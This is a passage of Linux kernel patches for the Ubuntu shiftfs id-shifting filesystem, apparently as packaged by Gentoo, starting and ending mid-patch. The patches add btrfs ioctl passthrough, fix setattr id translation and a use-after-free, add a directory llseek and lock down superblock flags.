mntget(sbinfo_mp->mnt); -+ sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - dentry = dget(path.dentry->d_fsdata); -- path_put(&path); -+ sbinfo->info_mark = sbinfo_mp; -+ } -+ -+ sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; -+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -+ printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -+ err = -EINVAL; -+ goto out_put_path; -+ } -+ -+ inode = new_inode(sb); -+ if (!inode) { -+ err = -ENOMEM; -+ goto out_put_path; - } -- ssi->userns = get_user_ns(dentry->d_sb->s_user_ns); -- sb->s_fs_info = ssi; -+ shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry); -+ -+ ihold(dentry->d_inode); -+ inode->i_private = dentry->d_inode; -+ - sb->s_magic = SHIFTFS_MAGIC; - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; -- sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry)); -+ sb->s_flags |= SB_POSIXACL; -+ sb->s_root = d_make_root(inode); -+ if (!sb->s_root) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ - sb->s_root->d_fsdata = dentry; -+ sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns); -+ shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode); - -- return 0; -+ dentry = NULL; -+ err = 0; - -- out_put: -+out_put_path: - path_put(&path); -- out: -+ -+out_free_name: - kfree(name); -- kfree(ssi); -+ -+ dput(dentry); -+ - return err; - } - -@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = { - - static int __init shiftfs_init(void) - { -+ shiftfs_file_info_cache = kmem_cache_create( -+ "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -+ SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -+ if (!shiftfs_file_info_cache) -+ return -ENOMEM; -+ - return register_filesystem(&shiftfs_type); - } - - static void __exit shiftfs_exit(void) - { - unregister_filesystem(&shiftfs_type); -+ kmem_cache_destroy(shiftfs_file_info_cache); - } - - MODULE_ALIAS_FS("shiftfs"); - MODULE_AUTHOR("James Bottomley"); --MODULE_DESCRIPTION("uid/gid shifting bind filesystem"); -+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>"); -+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>"); -+MODULE_DESCRIPTION("id shifting filesystem"); - MODULE_LICENSE("GPL v2"); - module_init(shiftfs_init) - module_exit(shiftfs_exit) --- -2.39.2 - -From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Thu, 4 Apr 2019 15:39:13 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -Shiftfs currently only passes through a few ioctl()s to the underlay. These -are ioctl()s that are generally considered safe. Doing it for random -ioctl()s would be a security issue. Permissions for ioctl()s are not -checked before the filesystem gets involved so if we were to override -credentials we e.g. could do a btrfs tree search in the underlay which we -normally wouldn't be allowed to do. -However, the btrfs filesystem allows unprivileged users to perform various -operations through its ioctl() interface. With shiftfs these ioctl() are -currently not working. To not regress users that expect btrfs ioctl()s to -work in unprivileged containers we can create a whitelist of ioctl()s that -we allow to go through to the underlay and for which we also switch -credentials. -The main problem is how we switch credentials. Since permissions checks for -ioctl()s are -done by the actual file system and not by the vfs this would mean that any -additional capable(<cap>)-based checks done by the filesystem would -unconditonally pass after we switch credentials. So to make credential -switching safe we drop *all* capabilities when switching credentials. This -means that only inode-based permission checks will pass. - -Btrfs also allows unprivileged users to delete snapshots when the -filesystem is mounted with user_subvol_rm_allowed mount option or if the -the callers is capable(CAP_SYS_ADMIN). The latter should never be the case -with unprivileged users. To make sure we only allow removal of snapshots in -the former case we drop all capabilities (see above) when switching -credentials. - -Additonally, btrfs allows the creation of snapshots. To make this work we -need to be (too) clever. When doing snapshots btrfs requires that an fd to -the directory the snapshot is supposed to be created in be passed along. -This fd obviously references a shiftfs file and as such a shiftfs dentry -and inode. This will cause btrfs to yell EXDEV. To circumnavigate this -problem we need to silently temporarily replace the passed in fd with an fd -that refers to a file that references a btrfs dentry and inode. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++-- - 1 file changed, 151 insertions(+), 5 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index ad1ae5bce6c1..678cad30f4a5 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1,6 +1,8 @@ -+#include <linux/btrfs.h> - #include <linux/capability.h> - #include <linux/cred.h> - #include <linux/mount.h> -+#include <linux/fdtable.h> - #include <linux/file.h> - #include <linux/fs.h> - #include <linux/namei.h> -@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, - - #define SHIFTFS_PASSTHROUGH_NONE 0 - #define SHIFTFS_PASSTHROUGH_STAT 1 --#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT) -+#define SHIFTFS_PASSTHROUGH_IOCTL 2 -+#define SHIFTFS_PASSTHROUGH_ALL \ -+ (SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL) -+ -+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info) -+{ -+ if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -+ return false; -+ -+ if (info->info_mark && -+ !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -+ return false; -+ -+ return true; -+} - - static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) - { -@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred, - return shiftfs_revert_object_creds(oldcred, newcred); - } - -+static inline bool is_btrfs_snap_ioctl(int cmd) -+{ -+ if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2)) -+ return true; -+ -+ return false; -+} -+ -+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, -+ void __user *arg, -+ struct btrfs_ioctl_vol_args *v1, -+ struct btrfs_ioctl_vol_args_v2 *v2) -+{ -+ int ret; -+ -+ if (!is_btrfs_snap_ioctl(cmd)) -+ return 0; -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) -+ ret = copy_to_user(arg, v1, sizeof(*v1)); -+ else -+ ret = copy_to_user(arg, v2, sizeof(*v2)); -+ -+ fdput(lfd); -+ __close_fd(current->files, fd); -+ kfree(v1); -+ kfree(v2); -+ -+ return ret; -+} -+ -+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, -+ struct btrfs_ioctl_vol_args **b1, -+ struct btrfs_ioctl_vol_args_v2 **b2, -+ struct fd *lfd, -+ int *newfd) -+{ -+ int oldfd, ret; -+ struct fd src; -+ struct btrfs_ioctl_vol_args *v1 = NULL; -+ struct btrfs_ioctl_vol_args_v2 *v2 = NULL; -+ -+ if (!is_btrfs_snap_ioctl(cmd)) -+ return 0; -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) { -+ v1 = memdup_user(arg, sizeof(*v1)); -+ if (IS_ERR(v1)) -+ return PTR_ERR(v1); -+ oldfd = v1->fd; -+ *b1 = v1; -+ } else { -+ v2 = memdup_user(arg, sizeof(*v2)); -+ if (IS_ERR(v2)) -+ return PTR_ERR(v2); -+ oldfd = v2->fd; -+ *b2 = v2; -+ } -+ -+ src = fdget(oldfd); -+ if (!src.file) -+ return -EINVAL; -+ -+ ret = shiftfs_real_fdget(src.file, lfd); -+ fdput(src); -+ if (ret) -+ return ret; -+ -+ *newfd = get_unused_fd_flags(lfd->file->f_flags); -+ if (*newfd < 0) { -+ fdput(*lfd); -+ return *newfd; -+ } -+ -+ fd_install(*newfd, lfd->file); -+ -+ if (cmd == BTRFS_IOC_SNAP_CREATE) { -+ v1->fd = *newfd; -+ ret = copy_to_user(arg, v1, sizeof(*v1)); -+ v1->fd = oldfd; -+ } else { -+ v2->fd = *newfd; -+ ret = copy_to_user(arg, v2, sizeof(*v2)); -+ v2->fd = oldfd; -+ } -+ -+ if (ret) -+ shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); -+ -+ return ret; -+} -+ - static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - unsigned long arg) - { -- long ret = 0; - struct fd lowerfd; - struct cred *newcred; - const struct cred *oldcred; -+ int newfd = -EBADF; -+ long err = 0, ret = 0; -+ void __user *argp = (void __user *)arg; -+ struct fd btrfs_lfd = {}; - struct super_block *sb = file->f_path.dentry->d_sb; -+ struct btrfs_ioctl_vol_args *btrfs_v1 = NULL; -+ struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL; -+ -+ ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2, -+ &btrfs_lfd, &newfd); -+ if (ret < 0) -+ return ret; - - ret = shiftfs_real_fdget(file, &lowerfd); - if (ret) -- return ret; -+ goto out_restore; - - ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); - if (ret) -@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - out_fdput: - fdput(lowerfd); - -+out_restore: -+ err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp, -+ btrfs_v1, btrfs_v2); -+ if (!ret) -+ ret = err; -+ - return ret; - } - -+static bool in_ioctl_whitelist(int flag) -+{ -+ switch (flag) { -+ case BTRFS_IOC_SNAP_CREATE: -+ return true; -+ case BTRFS_IOC_SNAP_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SUBVOL_CREATE: -+ return true; -+ case BTRFS_IOC_SUBVOL_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SNAP_DESTROY: -+ return true; -+ } -+ -+ return false; -+} -+ - static long shiftfs_ioctl(struct file *file, unsigned int cmd, - unsigned long arg) - { -@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd, - case FS_IOC_SETFLAGS: - break; - default: -- return -ENOTTY; -+ if (!in_ioctl_whitelist(cmd) || -+ !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) -+ return -ENOTTY; - } - - return shiftfs_real_ioctl(file, cmd, arg); -@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, - case FS_IOC32_SETFLAGS: - break; - default: -- return -ENOIOCTLCMD; -+ if (!in_ioctl_whitelist(cmd) || -+ !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) -+ return -ENOIOCTLCMD; - } - - return shiftfs_real_ioctl(file, cmd, arg); --- -2.39.2 - -From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Thu, 11 Apr 2019 07:31:04 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower - fs attrs -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824350 - -shiftfs_setattr() is preparing a new set of attributes with the -owner translated for the lower fs, but it then passes the -original attrs. As a result the owner is set to the untranslated -owner, which causes the shiftfs inodes to also have incorrect -ids. For example: - - # mkdir dir - # touch file - # ls -lh dir file - drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir - -rw-r--r-- 1 root root 0 Apr 11 13:05 file - # chown 500:500 dir file - # ls -lh dir file - drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir - -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file - -Fix this to pass the correct iattr struct to notify_change(). - -Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 678cad30f4a5..e736fd6afcb4 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(lowerd, attr, NULL); -+ err = notify_change(lowerd, &newattr, NULL); - revert_creds(oldcred); - inode_unlock(loweri); - --- -2.39.2 - -From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Sat, 13 Apr 2019 14:41:01 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for - setattr -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824717 - -shiftfs_setattr() makes a copy of the attrs it was passed to pass -to the lower fs. It then calls setattr_prepare() with the original -attrs, and this may make changes which are not reflected in the -attrs passed to the lower fs. To fix this, copy the attrs to the -new struct for the lower fs after calling setattr_prepare(). - -Additionally, notify_change() may have set ATTR_MODE when one of -ATTR_KILL_S[UG]ID is set, and passing this combination to -notify_change() will trigger a BUG(). Do as overlayfs and -ecryptfs both do, and clear ATTR_MODE if either of those bits -is set. - -Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com> -Acked-by: Brad Figg <brad.figg@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 10 +++++++++- - 1 file changed, 9 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index e736fd6afcb4..8e064756ea0c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = lowerd->d_inode; -- struct iattr newattr = *attr; -+ struct iattr newattr; - const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; - int err; -@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - if (err) - return err; - -+ newattr = *attr; - newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); - newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); - -+ /* -+ * mode change is for clearing setuid/setgid bits. Allow lower fs -+ * to interpret this in its own way. -+ */ -+ if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID)) -+ newattr.ia_valid &= ~ATTR_MODE; -+ - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); - err = notify_change(lowerd, &newattr, NULL); --- -2.39.2 - -From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Mon, 15 Apr 2019 15:21:55 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying - mount options -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824735 - -Copy up the passthrough mount settings of the mark mount point to the -shiftfs overlay. - -Before this commit we used to keep a reference to the shiftfs mark -mount's shiftfs_super_info which was stashed in the superblock of the -mark mount. The problem is that we only take a reference to the mount of -the underlay, i.e. the filesystem that is *under* the shiftfs mark -mount. This means when someone performs a shiftfs mark mount, then a -shiftfs overlay mount and then immediately unmounts the shiftfs mark -mount we muck with invalid memory since shiftfs_put_super might have -already been called freeing that memory. - -Another solution would be to start reference counting. But this would be -overkill. We only care about the passthrough mount option of the mark -mount. And we only need it to verify that on remount the new passthrough -options of the shiftfs overlay are a subset of the mark mount's -passthrough options. In other scenarios we don't care. So copying up is -good enough and also only needs to happen once on mount, i.e. when a new -superblock is created and the .fill_super method is called. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 29 ++++++++++++++++++----------- - 1 file changed, 18 insertions(+), 11 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 8e064756ea0c..4c8a6ec2a617 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -28,7 +28,7 @@ struct shiftfs_super_info { - const struct cred *creator_cred; - bool mark; - unsigned int passthrough; -- struct shiftfs_super_info *info_mark; -+ unsigned int passthrough_mark; - }; - - struct shiftfs_file_info { -@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info) - if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) - return false; - -- if (info->info_mark && -- !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL)) -- return false; -- - return true; - } - -@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) - if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT)) - return false; - -- if (info->info_mark && -- !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -- return false; -- - return true; - } - -@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - - if (info->passthrough != new.passthrough) { - /* Don't allow exceeding passthrough options of mark mount. */ -- if (!passthrough_is_subset(info->info_mark->passthrough, -+ if (!passthrough_is_subset(info->passthrough_mark, - info->passthrough)) - return -EPERM; - -@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - - sbinfo->mnt = mntget(sbinfo_mp->mnt); - dentry = dget(path.dentry->d_fsdata); -+ /* -+ * Copy up the passthrough mount options from the -+ * parent mark mountpoint. -+ */ -+ sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark; - } else { - sbinfo->mnt = mntget(path.mnt); - dentry = dget(path.dentry); -+ /* -+ * For a new mark passthrough_mark and passthrough -+ * are identical. -+ */ -+ sbinfo->passthrough_mark = sbinfo->passthrough; - } - - sbinfo->creator_cred = prepare_creds(); -@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sbinfo->mnt = mntget(sbinfo_mp->mnt); - sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - dentry = dget(path.dentry->d_fsdata); -- sbinfo->info_mark = sbinfo_mp; -+ /* -+ * Copy up passthrough settings from mark mountpoint so we can -+ * verify when the overlay wants to remount with different -+ * passthrough settings. -+ */ -+ sbinfo->passthrough_mark = sbinfo_mp->passthrough; - } - - sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; --- -2.39.2 - -From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Tue, 16 Apr 2019 18:29:00 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for - directories -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1824812 - -Give shiftfs it's own proper llseek method for directories. - -Before this commit we used to rely on an llseek method that was -targeted for regular files for both directories and regular files. -However, the realfile's f_pos was not correctly handled when userspace -called lseek(2) on a shiftfs directory file. Give directories their -own llseek operation so that seeking on a directory file is properly -supported. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 14 +++++++++++--- - 1 file changed, 11 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 4c8a6ec2a617..9771165d1ce0 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file) - return 0; - } - --static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence) -+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ return vfs_llseek(realfile, offset, whence); -+} -+ -+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence) - { - struct inode *realinode = file_inode(file)->i_private; - -@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) - const struct file_operations shiftfs_file_operations = { - .open = shiftfs_open, - .release = shiftfs_release, -- .llseek = shiftfs_llseek, -+ .llseek = shiftfs_file_llseek, - .read_iter = shiftfs_read_iter, - .write_iter = shiftfs_write_iter, - .fsync = shiftfs_fsync, -@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = { - .compat_ioctl = shiftfs_compat_ioctl, - .fsync = shiftfs_fsync, - .iterate_shared = shiftfs_iterate_shared, -- .llseek = shiftfs_llseek, -+ .llseek = shiftfs_dir_llseek, - .open = shiftfs_open, - .read = generic_read_dir, - .release = shiftfs_release, --- -2.39.2 - -From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Wed, 8 May 2019 14:13:14 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1827122 - -This locks down various superblock flags to prevent userns-root from -remounting a superblock with less restrictive options than the original -mark or underlay mount. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++- - 1 file changed, 46 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9771165d1ce0..a1dae7ea593b 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags) - return true; - } - -+static int shiftfs_super_check_flags(unsigned long old_flags, -+ unsigned long new_flags) -+{ -+ if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME)) -+ return -EPERM; -+ -+ if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME)) -+ return -EPERM; -+ -+ if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL)) -+ return -EPERM; -+ -+ return 0; -+} -+ - static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - { - int err; -@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data) - if (err) - return err; - -+ err = shiftfs_super_check_flags(sb->s_flags, *flags); -+ if (err) -+ return err; -+ - /* Mark mount option cannot be changed. */ - if (info->mark || (info->mark != new.mark)) - return -EPERM; -@@ -1847,6 +1878,16 @@ struct shiftfs_data { - const char *path; - }; - -+static void shiftfs_super_force_flags(struct super_block *sb, -+ unsigned long lower_flags) -+{ -+ sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV | -+ SB_NOEXEC | SB_NOATIME | SB_NODIRATIME); -+ -+ if (!(lower_flags & SB_POSIXACL)) -+ sb->s_flags &= ~SB_POSIXACL; -+} -+ - static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - int silent) - { -@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - goto out_put_path; - } - -+ sb->s_flags |= SB_POSIXACL; -+ - if (sbinfo->mark) { - struct super_block *lower_sb = path.mnt->mnt_sb; - -@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - */ - sb->s_iflags = SB_I_NOEXEC; - -+ shiftfs_super_force_flags(sb, lower_sb->s_flags); -+ - /* - * Handle nesting of shiftfs mounts by referring this mark - * mount back to the original mark mount. This is more -@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * passthrough settings. - */ - sbinfo->passthrough_mark = sbinfo_mp->passthrough; -+ shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags); - } - - sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1; -@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; -- sb->s_flags |= SB_POSIXACL; - sb->s_root = d_make_root(inode); - if (!sb->s_root) { - err = -ENOMEM; --- -2.39.2 - -From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Tue, 11 Jun 2019 11:47:35 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1832316 - -This enables toggling between ro/rw for btrfs subvolumes under shiftfs. - -Currently, btrfs workloads employing shiftfs cause regression. -With btrfs unprivileged users can already toggle whether a subvolume -will be ro or rw. This is broken on current shiftfs as we haven't -whitelisted these ioctls(). -To prevent such regression, we need to whitelist the ioctls -BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and -BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged -users. - -Cc: Seth Forshee <seth.forshee@canonical.com> -Cc: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 21 ++++++++++++++++++--- - 1 file changed, 18 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a1dae7ea593b..49f6714e9f95 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - return ret; - } - --static bool in_ioctl_whitelist(int flag) -+static bool in_ioctl_whitelist(int flag, unsigned long arg) - { -+ void __user *argp = (void __user *)arg; -+ u64 flags = 0; -+ - switch (flag) { -+ case BTRFS_IOC_FS_INFO: -+ return true; - case BTRFS_IOC_SNAP_CREATE: - return true; - case BTRFS_IOC_SNAP_CREATE_V2: -@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag) - case BTRFS_IOC_SUBVOL_CREATE: - return true; - case BTRFS_IOC_SUBVOL_CREATE_V2: -+ return true; -+ case BTRFS_IOC_SUBVOL_GETFLAGS: -+ return true; -+ case BTRFS_IOC_SUBVOL_SETFLAGS: -+ if (copy_from_user(&flags, arg, sizeof(flags))) -+ return false; -+ -+ if (flags & ~BTRFS_SUBVOL_RDONLY) -+ return false; -+ - return true; - case BTRFS_IOC_SNAP_DESTROY: - return true; -@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd, - case FS_IOC_SETFLAGS: - break; - default: -- if (!in_ioctl_whitelist(cmd) || -+ if (!in_ioctl_whitelist(cmd, arg) || - !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) - return -ENOTTY; - } -@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, - case FS_IOC32_SETFLAGS: - break; - default: -- if (!in_ioctl_whitelist(cmd) || -+ if (!in_ioctl_whitelist(cmd, arg) || - !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) - return -ENOIOCTLCMD; - } --- -2.39.2 - -From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Fri, 19 Jul 2019 17:50:46 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1837223 - -This enabled O_DIRECT support for shiftfs if the underlay supports it. - -Currently shiftfs does not handle O_DIRECT if the underlay supports it. -This is blocking dqlite - an essential part of LXD - from profiting from -the 